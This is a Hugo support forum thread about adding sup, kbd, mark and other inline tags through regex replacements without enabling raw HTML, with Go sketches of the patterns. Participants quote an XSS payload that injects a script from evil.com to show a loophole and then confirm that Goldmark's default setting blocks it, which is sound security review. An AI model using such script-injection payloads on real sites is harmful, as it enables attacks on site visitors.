Get missing inline HTML tags in Markdown without enabling HTML

Georg · August 27, 2022, 12:54pm

Hi,

Goldmark has no Markdown syntax for a few inline HTML tags. We can enable HTML to use them in our Markdown, but that is not a good solution where security is a concern, e.g. for themes or larger projects with many contributors. The site configuration parameter unsafe should be left at its default, unsafe = false.

Over the last few months, I’ve found the following replacements very useful for injecting some of the missing HTML tags after Goldmark has rendered the HTML. So far, there has been no interference with other Markdown elements, shortcodes or attributes. The syntax goes back to a suggestion @jmooring made somewhere in this forum.

Every element is surrounded by the curly braces { and }. A special ASCII character after the opening brace selects the replacement.

{^1} → <sup>1</sup>
{_2} → <sub>2</sub>
{#Key} → <kbd>Key</kbd>
{$variable} → <var>variable</var>
{!highlight} → <mark>highlight</mark>
{=Author} → <cite>Author</cite>
{+inserted} → <ins>inserted</ins>

These substitutions can be applied with Hugo’s replaceRE. I chained them together in one partial, which is called with .Content as input: {{ partial "content.html" .Content }}.

content.html:

{{
.
| replaceRE `\{\^([^}]*)\}` "<sup>$1</sup>"
| replaceRE `\{\_([^}]*)\}` "<sub>$1</sub>"
| replaceRE `\{\#([^}]*)\}` "<kbd>$1</kbd>"
| replaceRE `\{\!([^}]*)\}` "<mark>$1</mark>"
| replaceRE `\{\=([^}]*)\}` "<cite>$1</cite>"
| replaceRE `\{\+([^}]*)\}` "<ins>$1</ins>"
| replaceRE `\{\$([^}]*)\}` "<var>$1</var>"
| safeHTML }}
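
To try the patterns outside Hugo, here is a minimal Go sketch. It assumes that replaceRE behaves like ReplaceAllString from Go's regexp package, which matches the $1 replacement syntax used in the partial. The helper name applyInlineTags and the sample input are made up for illustration.

```go
package main

import (
	"fmt"
	"regexp"
)

// rule pairs one pattern from the partial with its replacement string.
type rule struct {
	re   *regexp.Regexp
	repl string
}

// rules mirrors the replaceRE chain in content.html, in the same order.
var rules = []rule{
	{regexp.MustCompile(`\{\^([^}]*)\}`), "<sup>$1</sup>"},
	{regexp.MustCompile(`\{\_([^}]*)\}`), "<sub>$1</sub>"},
	{regexp.MustCompile(`\{\#([^}]*)\}`), "<kbd>$1</kbd>"},
	{regexp.MustCompile(`\{\!([^}]*)\}`), "<mark>$1</mark>"},
	{regexp.MustCompile(`\{\=([^}]*)\}`), "<cite>$1</cite>"},
	{regexp.MustCompile(`\{\+([^}]*)\}`), "<ins>$1</ins>"},
	{regexp.MustCompile(`\{\$([^}]*)\}`), "<var>$1</var>"},
}

// applyInlineTags (hypothetical helper) runs every rule over HTML that
// has already been rendered from Markdown.
func applyInlineTags(html string) string {
	for _, r := range rules {
		html = r.re.ReplaceAllString(html, r.repl)
	}
	return html
}

func main() {
	fmt.Println(applyInlineTags("<p>H{_2}O, press {#Ctrl}, E = mc{^2}</p>"))
}
```

Braces without one of the seven marker characters, such as {plain}, are left untouched by every rule.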

Stay safe,
Georg

P.S.: After @salim pointed out a possible loophole in this approach, I changed the regex patterns to exclude angle brackets.

But this turned out to be unnecessary, as the discussion below has shown. The template is therefore back in its original form, and I now understand better how it works.

loupbrun · August 29, 2022, 2:34pm

Handy, thanks for the tip!

salim · September 1, 2022, 9:10pm

By relying on safeHTML like this, you’re essentially “enabling HTML”, I guess:

“It should not be used for HTML from a third-party, or HTML with unclosed tags or comments.”

I can use your substitution mechanism to insert arbitrary HTML:

{#<script src='https://evil.com'></script><script>nasty();</script>}

Georg · September 1, 2022, 9:39pm

Wow, thanks, looks like you’re right. This is the opposite of what I hoped to achieve. But these replacements do not work without safeHTML. Maybe we need to tighten the regex to exclude angle brackets. Would that do the trick?

salim · September 2, 2022, 11:38am

“Would that do the trick?”

I’m really no expert regarding XSS and stuff.

Generally, you should really know what you’re doing when declaring user input as safeHTML, i.e. sanitize it properly. I don’t know if simply blocking angle brackets is enough… I guess OWASP’s XSS Filter Evasion Cheat Sheet is a good starting point, see e.g. section Character Escape Sequences.

Georg · September 2, 2022, 12:20pm

I played around a little more with these regular expressions and noticed something odd. Hugo already seems to filter all tags when evaluating replaceRE.

Did you test your script attack with a recent Hugo version? Because I can’t get a tag through when using my original regex code.

jmooring · September 2, 2022, 3:40pm

With this in site configuration [1]:

[markup.goldmark.renderer]
unsafe = true

This markdown:

{#<script src='https://evil.com'></script><script>nasty();</script>}

With your original regex code, produces:

<p><kbd><script src='https://evil.com'></script><script>nasty();</script></kbd></p>

With your new regex code, produces:

<p>{#<script src='https://evil.com'></script><script>nasty();</script>}</p>

[1] Never a good idea unless you completely trust content authors.
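
The two results can be reproduced with Go's regexp package, as a rough sketch. The thread does not show the exact "new" pattern, so the strict variant here, which adds < and > to the excluded characters, is only an assumption. The helper name wrapKbd is also made up.

```go
package main

import (
	"fmt"
	"regexp"
)

var (
	// original is the <kbd> pattern from the first post.
	original = regexp.MustCompile(`\{\#([^}]*)\}`)
	// strict is an assumed variant that also rejects angle brackets;
	// the exact pattern used in the thread is not shown.
	strict = regexp.MustCompile(`\{\#([^}<>]*)\}`)
)

// wrapKbd (hypothetical helper) applies one pattern to rendered HTML.
func wrapKbd(re *regexp.Regexp, html string) string {
	return re.ReplaceAllString(html, "<kbd>$1</kbd>")
}

func main() {
	// With unsafe = true, raw HTML reaches .Content unchanged.
	attack := `<p>{#<script src='https://evil.com'></script><script>nasty();</script>}</p>`

	fmt.Println(wrapKbd(original, attack)) // script tags end up inside <kbd>
	fmt.Println(wrapKbd(strict, attack))   // no match, input is left as it was
	fmt.Println(wrapKbd(strict, "<p>{#Ctrl}</p>"))
}
```

Neither pattern removes the script tags. The strict one only declines to wrap them, so with unsafe = true the script would still reach the page.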

Georg · September 2, 2022, 4:32pm

Thanks, @jmooring, I hadn’t tested this before. These replacements are meant to be used with the default configuration unsafe = false. Maybe the template should check this setting and issue an error or a warning? It wouldn’t make much sense to use these replacements and also allow raw HTML.

I now have a question about Hugo’s workflow:
My impression is that, with unsafe = false, Hugo runs its raw HTML check after all content has been rendered and every replaceRE has run. Is that right? If so, I could remove the check for angle brackets again and rely on Hugo’s security check. This works on my installation, but I don’t know how far back this feature goes.

jmooring · September 2, 2022, 4:40pm

The unsafe = true/false configuration value sets the value of the yuin/goldmark html.WithUnsafe renderer option. Any manipulation of .Content occurs after goldmark has rendered the markdown to HTML.

Georg · September 2, 2022, 4:50pm

Thanks again, so the steps are the other way around. With unsafe = false (the default), Goldmark omits all raw HTML tags before replaceRE does its work, and I can rely on that check.

And with unsafe = true, an attacker doesn’t need the replacements to embed script code: script tags can be placed anywhere, just like the inline tags. If raw HTML is enabled, these replacements are of no use.
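
The ordering can be illustrated with a small Go sketch. It assumes that, with unsafe = false, Goldmark writes the placeholder comment <!-- raw HTML omitted --> in place of each raw tag, so the string built below only approximates what .Content might contain for the attack markdown. The helper names are made up.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// omitted is the placeholder Goldmark is assumed to emit in place of each
// raw HTML fragment when unsafe = false.
const omitted = "<!-- raw HTML omitted -->"

// kbd is the original <kbd> pattern from the first post.
var kbd = regexp.MustCompile(`\{\#([^}]*)\}`)

// defaultContent (hypothetical) approximates .Content for the attack
// markdown under the default configuration: three tags are dropped before
// the text "nasty();" and one after it.
func defaultContent() string {
	return "<p>{#" + strings.Repeat(omitted, 3) + "nasty();" + omitted + "}</p>"
}

// applyKbd runs the replacement the way the partial does, after rendering.
func applyKbd(content string) string {
	return kbd.ReplaceAllString(content, "<kbd>$1</kbd>")
}

// hasScriptTag reports whether an opening script tag is present.
func hasScriptTag(html string) bool {
	return strings.Contains(html, "<script")
}

func main() {
	out := applyKbd(defaultContent())
	fmt.Println(out)
	fmt.Println("script tag present:", hasScriptTag(out))
}
```

In this sketch the pattern still matches and wraps the leftover text in kbd tags, but the script tags were removed before the regex ever saw them.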

jmooring · September 2, 2022, 4:59pm

Which is why, if a site or theme author is ever tempted to do this…

[markup.goldmark.renderer]
unsafe = true

…they should find another way.

tut · September 3, 2022, 6:39am

I have been following the discussion because I have used the cite option extensively in my pages over the last two days. So, good to know it is all good.
